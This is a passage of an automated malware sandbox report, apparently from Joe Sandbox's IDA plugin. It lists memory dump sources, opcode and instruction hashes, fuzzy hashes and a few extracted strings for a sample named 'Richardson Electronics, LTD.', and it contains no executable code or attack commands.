                                                              • Opcode Fuzzy Hash: 3d499befc6c3249be2883e555e5a5bbd75466a0c90e243c1f45c0f80960fcdfe
                                                              • Instruction Fuzzy Hash: 43E0177185120CEFC751FFB8DA0869E7BF99B09300F1066A9D90897250EEB28E549B96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: b24ad9a91131c87df701e67ddc2e60837b04576c44003e07a23ee0663a9e11a0
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: BEE01274949208DFD744DF94E54566DBBF8EB45304F1482D9DC081B341C6719E42DB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: e352bda122a2de9d5919e53c005ba4534df53a8abb23c10f117e7751d8d6870c
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 2DE0C234908208DFCB84EF94E54466DBBB8EF85300F20D2D8CC0817384C6319E42CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 3093e4c6c40d7c82c1ddc6420f354c0dd98e92453fe2758509ce4534bf1befa6
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 97E0C234A08308EFCB44DF94E54466DBBB8EB45310F2082ECCC0817380DB319E82DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 3a90d64096165479ddaa3ceec74888bc0c21e1abf0041582ca1d9fc37662351e
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 67E0C274948208DFC744EF94E54867DBBB8EB46300F1082D8CC081B350C6319E42CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: d308b16504c9a6142a0260e3013b2814ff04d203a960e9c438696f776f033794
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 27E0EC34949208DBDB44DF94E54566DBBB8AB45304F1486ED980827341CB719E42DB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction ID: 36a86e3571dc0a863b78840700d92bb9d3dcc646c18186ac3683db8985278bed
                                                              • Opcode Fuzzy Hash: 78ede36cc93d4c5c58d92ad572f3bba2abae6f964b8aa3fc95764c9b157ca0ea
                                                              • Instruction Fuzzy Hash: 8DE0C238908208EFCB44DF94E94466DBBB8EB85300F10C2ECCD0817340CA329F42DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd4cffb7888b64df65ca03c46ab31bd07cc9e084c242aaf2d1d36e8e94095f2b
                                                              • Instruction ID: 84e0ff824080bd9aa8d68f082e1ae6e1e9c9fbe4c2591c8a2aed35f1e79b0c5f
                                                              • Opcode Fuzzy Hash: bd4cffb7888b64df65ca03c46ab31bd07cc9e084c242aaf2d1d36e8e94095f2b
                                                              • Instruction Fuzzy Hash: 2DE0C231800208DFC740EFF8D50979E7FF8DB05301F0001A5D60597110EEB24A409791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc6d8f9d87c8f6cfd5ffcb09b0fbd8b5e2b1cbd4a8fda28fd21af45ae6247ed9
                                                              • Instruction ID: c578a18bc0d76bc390691cc3e12436b519de401c58a9086eb957b4d1c687d83c
                                                              • Opcode Fuzzy Hash: cc6d8f9d87c8f6cfd5ffcb09b0fbd8b5e2b1cbd4a8fda28fd21af45ae6247ed9
                                                              • Instruction Fuzzy Hash: DEE0EC74D95208DFDB90DFA9D54979DBFF8EB04201F1001A9EC4993240E6709B80DB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d0936fb404af0f84c3d46e0d33abd011fbfcdb1141cb7a8834f55e8940ac58b
                                                              • Instruction ID: ebd0d90ac9ad3c5680c139c00937f929e2dd84e7ac04bfb3d8e327e21e55f972
                                                              • Opcode Fuzzy Hash: 3d0936fb404af0f84c3d46e0d33abd011fbfcdb1141cb7a8834f55e8940ac58b
                                                              • Instruction Fuzzy Hash: 3CE01230A51209EFDB04EFB4D94066DBBBAEF95200F108599D909EB280DA719E04AB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbd26bc91850b55af7586d100cd123befb5febd4c1ef13536376a4c38f1018a6
                                                              • Instruction ID: 449b7d789dcd9a5a1da41511283695fb658b17415c9b918e02f2dd6ba96b2f7e
                                                              • Opcode Fuzzy Hash: fbd26bc91850b55af7586d100cd123befb5febd4c1ef13536376a4c38f1018a6
                                                              • Instruction Fuzzy Hash: 06F09278A4122B8FDBA4EF10DC88AADBBB5BB49340F5041E5D91963395DB305E81CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 566c87bd8f2615e4ff98bba4be18cb4773222bf84488835942e0695978bbfb31
                                                              • Instruction ID: 09bed89835e4819b361d5d4453aeec8ac876c114310316e09b1215057b54eb42
                                                              • Opcode Fuzzy Hash: 566c87bd8f2615e4ff98bba4be18cb4773222bf84488835942e0695978bbfb31
                                                              • Instruction Fuzzy Hash: 13D02B30C45208DFC700DFA4E409B6E7FB8EF46301F1041A4D90923240C7701E85CB94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39a87200d660acf97afc5daeba27b8d26b574b661126668cc41e6198bde81f9a
                                                              • Instruction ID: 3083ef21ae5ed95db0673fd89ba2776b22721087b377b477ab359c15f64cd442
                                                              • Opcode Fuzzy Hash: 39a87200d660acf97afc5daeba27b8d26b574b661126668cc41e6198bde81f9a
                                                              • Instruction Fuzzy Hash: E6D05E30C5A20DDFD758EFA8E6446AEBBB8AB41301F5042EDC90427744D771AE80DB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92dbd52a20a85e0eb49cc8781ecea96e0985b09be8925dfd64f5665e25dda817
                                                              • Instruction ID: bc9eff86fbd4bb45599a934abbfac4047534c5b839844470984ae426cbed01a7
                                                              • Opcode Fuzzy Hash: 92dbd52a20a85e0eb49cc8781ecea96e0985b09be8925dfd64f5665e25dda817
                                                              • Instruction Fuzzy Hash: 6BF048749247288FCBA0CF29D8547CABBB0BB49301F10A4EA9849A2280EB311EC0CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c2ce0d0e78e4dfb1fbe6bfde61ac964d154e6ed3cee340bb67489b9f4c34742
                                                              • Instruction ID: 66d17efe92283326643d8ceed9ebf27e5d21e12f7bb94083c35df207a8529ab1
                                                              • Opcode Fuzzy Hash: 6c2ce0d0e78e4dfb1fbe6bfde61ac964d154e6ed3cee340bb67489b9f4c34742
                                                              • Instruction Fuzzy Hash: 78E0C234844308DFC7A0DBA8D50436CBFF8DB45200F1481D9DC4857341D7319E42CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d238d146ac411cd0806274fa0a40197fe070f2db55041f762d79b00e699e252
                                                              • Instruction ID: 17a0bf98f1ba74435bb9177d90a488e3ea12db242a105be160c6d11d2a9abea2
                                                              • Opcode Fuzzy Hash: 6d238d146ac411cd0806274fa0a40197fe070f2db55041f762d79b00e699e252
                                                              • Instruction Fuzzy Hash: 09E04F35650208EFCF01CFD4D444AAEBB72FB4A324F108118E50567298CB365D94DF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 157924f56bc17389be5a0dc85ed01b167beb1b243bcbab23d852ebca8bdbcace
                                                              • Instruction ID: 455662e0c63f8ccce0b2a3d7e684e1fe4e077a6c0b28eb90f92a16ae7ae14833
                                                              • Opcode Fuzzy Hash: 157924f56bc17389be5a0dc85ed01b167beb1b243bcbab23d852ebca8bdbcace
                                                              • Instruction Fuzzy Hash: 05E0E5759102289FDB51CF54C844BEEBBBAFB09310F1092DAE549A3284C6749EC48F91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c2ce0d0e78e4dfb1fbe6bfde61ac964d154e6ed3cee340bb67489b9f4c34742
                                                              • Instruction ID: 15ec66ddad9332735a9d56de4dc8790c98f8bad61800857c20c522dba0d69efd
                                                              • Opcode Fuzzy Hash: 6c2ce0d0e78e4dfb1fbe6bfde61ac964d154e6ed3cee340bb67489b9f4c34742
                                                              • Instruction Fuzzy Hash: 95E0C230C14248DFC784DBA8D51427CFFF8AB0A200F1482D9CC4857341D6729E41CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1591a8b6c38294ef1839e1f0e636de3f703a4c383fadc021350a5b913512788
                                                              • Instruction ID: 199291cd75ce4ff33096f2addd9dd434dd693749ca652d063af234a21e4c733f
                                                              • Opcode Fuzzy Hash: e1591a8b6c38294ef1839e1f0e636de3f703a4c383fadc021350a5b913512788
                                                              • Instruction Fuzzy Hash: 8CD05E3500A394AFC3124B20EC09CC27F789F0661070540C2F0848B572C6219D64CBF3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b1436d0a200fc8dff73f9001f69e891abd8af76d4ff00db8c9452f7c4379366
                                                              • Instruction ID: dd6012b1a155dfa8fa6cd004202f006e35042eac82d94c80a21f6c07509d3054
                                                              • Opcode Fuzzy Hash: 1b1436d0a200fc8dff73f9001f69e891abd8af76d4ff00db8c9452f7c4379366
                                                              • Instruction Fuzzy Hash: 1DE01274A80249EFDB44DFA4E54069D7BF9EB45300F104198D509E7380DA759E049791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 460d57fc8dc1756435e04cad8bca4d6b64b36e20509454c0732b9ddb0f13f672
                                                              • Instruction ID: 32957e79622140525fc8c2b27694f83bb674c7bc9387bb1f896a1157d822a5f8
                                                              • Opcode Fuzzy Hash: 460d57fc8dc1756435e04cad8bca4d6b64b36e20509454c0732b9ddb0f13f672
                                                              • Instruction Fuzzy Hash: 6BD05E34519208DBD704CB98D505A7ABBADDB45604F15419C990947341CA72AE02CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 245dbf5aad82141c4f82726e7ae4fff2a97f2944d151ef49c5b3538b0e83a039
                                                              • Instruction ID: cb595b9d469773cb5020b87417fa7349b0230ce825f9ec1fa8396b32877ec5f2
                                                              • Opcode Fuzzy Hash: 245dbf5aad82141c4f82726e7ae4fff2a97f2944d151ef49c5b3538b0e83a039
                                                              • Instruction Fuzzy Hash: 99D0A735106340DFD3179730E9148F3BF32EBD2310712829BE18046D51D6398C06CBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d550248ea0d4b57ef0ff95ac80272b94189905d9875088d76e835c7a6faa53e2
                                                              • Instruction ID: 1e12584140e475db760518fd7511e19ba1bd69104aba65810a5a639999794c4f
                                                              • Opcode Fuzzy Hash: d550248ea0d4b57ef0ff95ac80272b94189905d9875088d76e835c7a6faa53e2
                                                              • Instruction Fuzzy Hash: D2E0C274A002298FD764EF24E99DBADBB71FB45319F0002A8D40EA7285DB711EC1CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c5cde72b701f9f7478f39c7cf50be45aa5e9f13c7256e8613a099e89db85df0
                                                              • Instruction ID: abaeef3ee61868236fb454ad9558a398e1be3894e86f0346a3c3fa147266a2df
                                                              • Opcode Fuzzy Hash: 7c5cde72b701f9f7478f39c7cf50be45aa5e9f13c7256e8613a099e89db85df0
                                                              • Instruction Fuzzy Hash: 0FC0127950A3905FD7134A309D168D7BFA1AB6160070545ABF080C6816D6284E94C7B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8467b7a9660eecbb6b659b6e3396b8bbb800c20a396b32f85ab5b9156c5a807
                                                              • Instruction ID: 4ad4a54ec8bd19245671633c1d2cd44f4176525461ae9e4389a2affbf06d8c85
                                                              • Opcode Fuzzy Hash: c8467b7a9660eecbb6b659b6e3396b8bbb800c20a396b32f85ab5b9156c5a807
                                                              • Instruction Fuzzy Hash: D2E0BD3494036ACFEBA0CF14D808B6EBBB1FF00340F0082E5940AA7291D37099C0CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c76381adb757cd652defeb6a1122fcaa087f9abd2dfa3384245d03f8abbf6858
                                                              • Instruction ID: cb8a7022530b32dec427ce92c9a72b15acfbedb10b0af95fe65312ec8268303a
                                                              • Opcode Fuzzy Hash: c76381adb757cd652defeb6a1122fcaa087f9abd2dfa3384245d03f8abbf6858
                                                              • Instruction Fuzzy Hash: 85E0BD3990426ACFDB21DF20D808BE9BBB1BB08305F0486E6880A62251C3748AC5CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38ee1402c201870f086e647ad6fe1e62518161eccf956b9359609aba11941ac9
                                                              • Instruction ID: 699cd044d77aead195f6d84c39595a519378e1b25f56c48861e2f196a2ee6914
                                                              • Opcode Fuzzy Hash: 38ee1402c201870f086e647ad6fe1e62518161eccf956b9359609aba11941ac9
                                                              • Instruction Fuzzy Hash: E6C02B7204A3268BF3501654BC0C33332FCAF03309F002A00E50D000910AE0C4C0D684
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ca13b758021f008b41a87c9961e08fb4b9982fa817fc5a3be2af469b0771a37
                                                              • Instruction ID: 363143ac13a0ebb333c9441d22a2386ab641636015d20f7ac8ca9ee7cc2530c8
                                                              • Opcode Fuzzy Hash: 1ca13b758021f008b41a87c9961e08fb4b9982fa817fc5a3be2af469b0771a37
                                                              • Instruction Fuzzy Hash: 61C08C300603094BE6503BE9B90D32A36585B01609F040314EB4C020018EB18484C66B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1fa868fb8c9b917da3b867cc505405c0f8c3e030366edbb037daf738eae9814e
                                                              • Instruction ID: 4fc2decba582004af28a70dc0c5cc7922e075e842040357f70ad1174f03510cd
                                                              • Opcode Fuzzy Hash: 1fa868fb8c9b917da3b867cc505405c0f8c3e030366edbb037daf738eae9814e
                                                              • Instruction Fuzzy Hash: 48C00176E1002A9A8B00DAD9E8808DCBBB4EB94322B008026E225AA204D630292A8B50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5da129fdbfd64f137a1ef74cc8a1f473eee3b88d9f94c6156cd4924a1b3d83f2
                                                              • Instruction ID: 92a52c88c8a82319342e83716cd59ebf305acf230bf038b4afbadcaaa8970c13
                                                              • Opcode Fuzzy Hash: 5da129fdbfd64f137a1ef74cc8a1f473eee3b88d9f94c6156cd4924a1b3d83f2
                                                              • Instruction Fuzzy Hash: 9EC04C0444A7D15AD7567B2088100966FB5184245439909CBA0D45A053C109595C8265
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ceb1d6b7d5296cd87fed34ba0b94e607345e4403b2e0e24707e2f412f4ea07f
                                                              • Instruction ID: 3895d92c91f09a043e95426b78987c932214dcf7cd59a8ee7b131defe075b497
                                                              • Opcode Fuzzy Hash: 8ceb1d6b7d5296cd87fed34ba0b94e607345e4403b2e0e24707e2f412f4ea07f
                                                              • Instruction Fuzzy Hash: 17A002786C52006AFE2456607D5BFC53A156750F41F2000407305DD0C1C9D9508095B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Ta$c8}=
                                                              • API String ID: 0-3594345269
                                                              • Opcode ID: 3b6379833f14a55e7930aec7b35f8c16dd1e18aeee6d0024132c1d8c518db8d4
                                                              • Instruction ID: 1c02a190fe8561b643c30a494fbb1324b7b0beb427de7bc982e0f240f6169d04
                                                              • Opcode Fuzzy Hash: 3b6379833f14a55e7930aec7b35f8c16dd1e18aeee6d0024132c1d8c518db8d4
                                                              • Instruction Fuzzy Hash: D4A1F574E51218CFDB54CFA9D844B9DBBF2BF89304F209269E409AB394D7749985CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Ta$c8}=
                                                              • API String ID: 0-3594345269
                                                              • Opcode ID: 647be4cda2d27b09792add15334e94726a2165578aa95e60633c779e5f265fa9
                                                              • Instruction ID: 15efef7c99cd9d63d71843b548975a1689a1dbf6685655276d836fb2384af7ef
                                                              • Opcode Fuzzy Hash: 647be4cda2d27b09792add15334e94726a2165578aa95e60633c779e5f265fa9
                                                              • Instruction Fuzzy Hash: BBA10470E51218CFEB54CFA9D844BADBBF2BF89304F209269E409AB395D7749985CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .4S
                                                              • API String ID: 0-1003676507
                                                              • Opcode ID: 06691f4ae13af87f62ba702ebfff3ae5f558bd96db61c4dccc0bb9d631082aea
                                                              • Instruction ID: 52989a5a646e933d17e4fe5fb4cf02b47ff08fda619b009e7d3a9c47ac26952a
                                                              • Opcode Fuzzy Hash: 06691f4ae13af87f62ba702ebfff3ae5f558bd96db61c4dccc0bb9d631082aea
                                                              • Instruction Fuzzy Hash: DF816874D50208CFDB94CFAAE444BADBBF6FB4A310F5092AAE019A7394DB705984CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .4S
                                                              • API String ID: 0-1003676507
                                                              • Opcode ID: cba3726120b2158bbb92f1acb1e525d7af4fa129fc395e7cd4ff88439868d2d1
